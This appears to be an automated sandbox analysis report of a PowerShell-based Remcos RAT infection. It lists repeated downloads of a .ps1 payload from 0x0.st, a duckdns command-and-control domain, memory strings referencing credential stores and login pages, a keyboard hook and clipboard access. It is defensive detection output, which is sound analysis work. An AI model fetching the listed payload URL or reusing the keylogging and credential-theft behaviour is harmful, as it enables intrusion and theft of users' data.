                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.10:49722 -> 168.119.145.117:443
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: powershell.exe, 0000000E.00000002.1527715092.00000000030B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                Source: powershell.exe, 0000000E.00000002.1527715092.00000000030B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                Source: powershell.exe, 00000010.00000002.1519870939.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: powershell.exe, powershell.exe, 00000010.00000002.1519870939.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: powershell.exe, 0000000E.00000002.1526632717.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: powershell.exe, 0000000E.00000002.1526632717.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: 0x0.st
                Source: global trafficDNS traffic detected: DNS query: abokirem.duckdns.org
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: powershell.exe, 00000045.00000002.4118086218.00000000076F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro)8
                Source: powershell.exe, 00000036.00000002.3030075477.0000000007BB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microS
                Source: powershell.exe, 00000021.00000002.1947423271.0000000003655000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                Source: powershell.exe, 0000000B.00000002.1577103646.00000000091E8000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.1576231217.0000000009110000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1741165047.0000000008F1C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.1896532258.000000000882C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000021.00000002.2065499351.000000000940C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000026.00000002.2225364286.000000000905C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000002B.00000002.2404458461.0000000008C7C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000030.00000002.2770159710.000000000925C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000036.00000002.3152004242.00000000094AC000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000003B.00000002.3497316854.000000000936C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000040.00000002.3745750171.000000000873C000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                Source: powershell.exe, 0000000B.00000002.1554678981.0000000006459000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 0000000B.00000002.1549220912.0000000005544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 0000000B.00000002.1549220912.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1684419964.0000000004FA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1812364095.0000000004995000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1954257014.00000000056E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2089787998.00000000050C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2237758979.00000000046F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2426639542.0000000005185000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.2565749107.00000000053A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2714523044.00000000051FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2873276195.00000000047F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.3194366176.00000000050B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 0000000B.00000002.1549220912.0000000005544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, powershell.exe, 00000010.00000002.1519870939.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                Source: powershell.exe, powershell.exe, 00000010.00000002.1519870939.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                Source: powershell.exe, 00000010.00000002.1519870939.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: powershell.exe, 00000010.00000002.1519870939.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                Source: powershell.exe, 0000002B.00000002.2390048657.0000000006DF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                Source: powershell.exe, 0000000E.00000002.1526911774.0000000000834000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                Source: powershell.exe, 00000010.00000002.1519870939.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: powershell.exe, 0000000B.00000002.1549220912.0000000005544000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1684419964.00000000050F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1812364095.0000000004AE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1954257014.0000000005834000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2089787998.0000000005214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2237758979.0000000004844000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2426639542.00000000052D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.2565749107.00000000054E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2714523044.0000000005344000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2873276195.0000000004944000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.3194366176.0000000005206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0x0.st
                Source: powershell.exe, 00000045.00000002.3194366176.0000000005206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0x0.st/8KuV.ps1
                Source: powershell.exe, 0000000B.00000002.1549220912.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1684419964.0000000004FA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1812364095.0000000004995000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1954257014.00000000056E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2089787998.00000000050C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2237758979.00000000046F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2426639542.0000000005185000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.2565749107.00000000053A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2714523044.00000000051FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2873276195.00000000047F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.3194366176.00000000050B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: powershell.exe, 0000000B.00000002.1554678981.0000000006459000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 0000000B.00000002.1554678981.0000000006459000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 0000000B.00000002.1554678981.0000000006459000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 0000000B.00000002.1549220912.0000000005544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 0000000E.00000002.1527412059.0000000002E1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.Z3
                Source: powershell.exe, 0000000E.00000002.1527412059.0000000002E1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: powershell.exe, 0000000E.00000002.1527412059.0000000002E1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: powershell.exe, 0000000E.00000002.1527412059.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1527715092.00000000030B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: powershell.exe, 0000000B.00000002.1554678981.0000000006459000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, powershell.exe, 00000010.00000002.1519870939.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49702 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49720 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.10:49726 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Installs a global keyboard hook
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0040C143 GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA,15_2_0040C143
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_00406DFC
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_00406E9F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_004068B5
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,16_2_004072B5
                Source: Yara matchFile source: 11.2.powershell.exe.9111288.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.9111288.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.1577103646.00000000091E8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1576231217.0000000009110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2232, type: MEMORYSTR

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 11.2.powershell.exe.9111288.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.9111288.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000002B.00000002.2404458461.0000000008C77000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.1738368992.0000000008969000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.1682233166.00000000031AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000030.00000002.2770159710.0000000009257000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000045.00000002.4126886116.0000000007749000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.1891644249.0000000008290000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000045.00000002.4130426357.0000000007752000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003B.00000002.3497316854.0000000009367000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000030.00000002.2678699893.0000000007840000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.1896532258.0000000008827000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003B.00000002.3442365078.0000000008DB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1577103646.00000000091E8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000036.00000002.3152004242.00000000094A7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.2080996023.0000000003129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000040.00000002.3745750171.0000000008737000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004F.00000002.3526539449.0000000002D7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.2065499351.0000000009407000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000030.00000002.2731153050.0000000008CCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.2225364286.0000000009057000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000040.00000002.3689742883.0000000008197000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
